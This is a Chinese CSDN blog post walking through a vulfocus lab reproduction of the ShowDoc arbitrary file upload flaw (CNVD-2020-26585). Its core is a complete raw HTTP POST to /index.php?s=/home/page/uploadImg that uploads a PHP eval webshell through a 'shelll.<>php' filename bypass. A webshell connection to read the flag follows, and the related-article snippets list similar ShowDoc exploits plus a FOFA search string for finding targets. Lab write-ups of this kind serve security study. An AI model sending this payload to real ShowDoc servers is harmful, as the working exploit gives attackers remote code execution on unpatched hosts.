showdoc文件上传-vulfocus/showdoc-cnvd_2020_26585:latest 漏洞复现实战

已于 2022-12-13 16:47:59 修改
阅读量364 收藏
点赞数
分类专栏: web安全 漏洞复现 文章标签: web 安全
于 2022-12-13 16:44:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40416851/article/details/128304241
版权

showdoc任意文件上传

名称: vulfocus/showdoc-cnvd_2020_26585:latest

描述:
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。

api_page存在任意文件上传.
在这里插入图片描述
直接抓包,存在漏洞的接口为:
http://XXX.com/index.php?s=/home/page/uploadImg

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: XXX.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=pffqksas1r8lqd6ls3hivqvjh2; think_language=zh-CN
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 264

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="shelll.<>php"
Content-Type: text/plain

<?php echo 'hello';@eval($_POST[cmd])?>
----------------------------921378126371623762173617

在这里插入图片描述

使用webshell工具连接,在/tmp目录下存在flag
在这里插入图片描述

yami紫灵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ShowDoc后台文件上传漏洞复现 CVE-2021-41745&CNVD-2020-49480
afei001
08-09 1223
ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。Showdoc存在文件上传漏洞,攻击者可以利用漏洞获取服务器权限。
ShowDoc item_id 未授权SQL注入漏洞复现
0xSec
06-05 1134
2024年6月,ShowDoc官方发布新版本修复了一个SQL注入漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可暴破用户token获取系统后台权限,建议所有使用该系统的企业尽快升级修复,以确保系统安全
ShowDoc文件上传漏洞CNVD-2020-26585
m0_57900228的博客
03-20 1045
1、先访问链接:http://ip:prot/index.php?s=/home/page/uploadImg 如果出现“ 没有上传的文件!”,说明可能存在漏洞并可以尝试利用。ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。api_page存在任意文件上传。3、文件上传成功(上图),复制链接至蚁剑,将所有的“\”去除。声明:文章仅供安全研究与学习之用,请勿用于非法用途!2、打开页面直接抓包后改包。
showdoc 文件上传CNVD-2020-26585漏洞复现
weixin_42675091的博客
09-03 1913
showdoc 文件上传CNVD-2020-26585漏洞复现
showdoc 文件上传漏洞(cnvd-2020-26585)
xy_wjyjw的博客
10-29 246
刷新页面,点击(Intercept is off)开始抓包。打开虚拟终端,输入命令(dir /tmp),查看flag。替换全部报文,修改Host和一句话木马。用蚁剑连接,连接成功,并添加。发送给respones,showdoc 文件上。在bp网页中打开ip(发送到Repeater。
ShowDoc远程下载导致文件上传漏洞复现 CVE-2021-36440&CVE-2022-1034
afei001
08-07 1004
ShowDoc v2.9.5中,不受限制的文件上传允许远程攻击者通过组件AdminUpdateController.class.php中的'file_url'参数执行任意代码。
swagger-showdoc:一个将swagger的Json文件转换为ShowDoc的小工具
05-01
本项目旨在帮助使用swagger项目的团队,利用现有的swagger.json格式文件来实现文档的自动生成,文档的展示使用了showDoc 软件架构 Spring Boot 2.0.3 JDK 1.8 swagger2markup 1.3.3 okhttp 3.11.0 使用说明 克隆项目...
showdoc-master.zip_Doc.master_showdoc_showdoc官网_showdoc开源_showdo
09-21
《showdoc:构建高效API文档的利器》 Showdoc,作为一个开源的API网站,它为开发者提供了一种简单而高效的方式来管理和展示API文档。在这个信息化快速发展的时代,API(Application Programming Interface)已经...
showdoc_api.nim:showdoc_api.sh有bug,用Nim写一个新的
02-03
使用Nim编译的二进制文件可以在多种操作系统上运行,这使得`showdoc_api.nim`在不同环境下具有良好的可移植性。此外,由于Nim代码的简洁性和可读性,维护成本相对较低。 总的来说,`showdoc_api.nim`项目体现了选择...
wechat_pc_api:微信机器人,微信HOOK,微信PC版挂钩
03-19
o6uj功能清单任意多开支持已经在运行微信进程支持接收所有类型的消息(包括接口发送,pc电脑上直接发送的)支持获取群,群成员,好友列表,公众号列表支持常见消息类型的发送支持表情符号文件具体使用可以暂时参考...
showdoc-master.zip
07-28
"showdoc-master.zip" 是一个压缩包文件,其名称表明它包含了 "showdoc-master" 项目的源代码或资源。ShowDoc 是一个开源的文档管理系统,主要用于项目文档的编写、管理和分享,尤其适合软件开发团队使用。它以 ...
showDoc部署资源
11-02
简单在windows上部署showDoc,包含IP的修改和部署中出现的问题
showdoc, ShowDoc是一个非常适用于it团队在网上共享文档的工具.zip
10-10
showdoc, ShowDoc是一个非常适用于it团队在网上共享文档的工具 中文版教程:https://www.showdoc.cc/help什么是 ShowDoc?每当我们接受一个由它的他人开发的模块或者项目时,我们总是觉得那些没有注释的代码。 文档文件在哪里? ! 给我看看医生 ! 程序员经常希望它的他
ShowDoc漏洞学习——CNVD-2020-26585(任意文件上传
记录并分享学习安全的知识点..
07-24 1147
​ ShowDoc一个非常适合IT团队的API文档、技术文档工具。2.8.3以下版本的ShowDoc 存在任意文件上传漏洞,攻击者通过构造特殊的数据包可以上传恶意文件控制服务器。
漏洞复现-showdoc-文件上传】​vulfocus/showdoc-cnvd_2020_26585
10-10 2056
【showdoc-文件上传】API_page存在任意文件上传
ShowDoc后台文件上传漏洞分析 CNVD-2020-49480(CVE-2021-41745)
afei001
08-06 660
​ github获取ShowDoc源码,版本:ShowDoc v2.8.2,使用phpstudy本地搭建环境。环境搭建参考官网:ShowDoc
vulfocus——showdoc文件上传(cnvd-2020-26585
m0_62063669的博客
09-17 1089
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。3.访问文件路径,出现“hello”,说明木马是成功写入的,用webshell工具连接获得flag。2.写入一句话木马,然后发送,返回文件路径。1.打开web页面直接抓包,然后改包。4.或者不使用webshell工具。
ShowDoc任意文件上传绕过手法分享
自强不息
07-16 865
因为你仍能痛苦,所以说明你对生活还抱有希望!
ShowDoc 远程代码执行漏洞
weixin_51387754的博客
11-02 2708
漏洞简介 ShowDoc 是一个非常适合 IT 团队的在线文档分享工具,它可以加快团队之间沟通的效率。 漏洞复现 fofa语句: app=“ShowDoc” 抓包 POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding:
vulfocus-showdoc
最新发布
06-06
vulfocus-showdoc是一款基于Docker的Web安全漏洞环境,其中包含了常见的Web漏洞类型,如SQL注入、XSS、CSRF等等,并且内置了ShowDoc文档生成工具,方便对漏洞环境的使用和学习进行记录和总结。 ShowDoc是一款开源的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值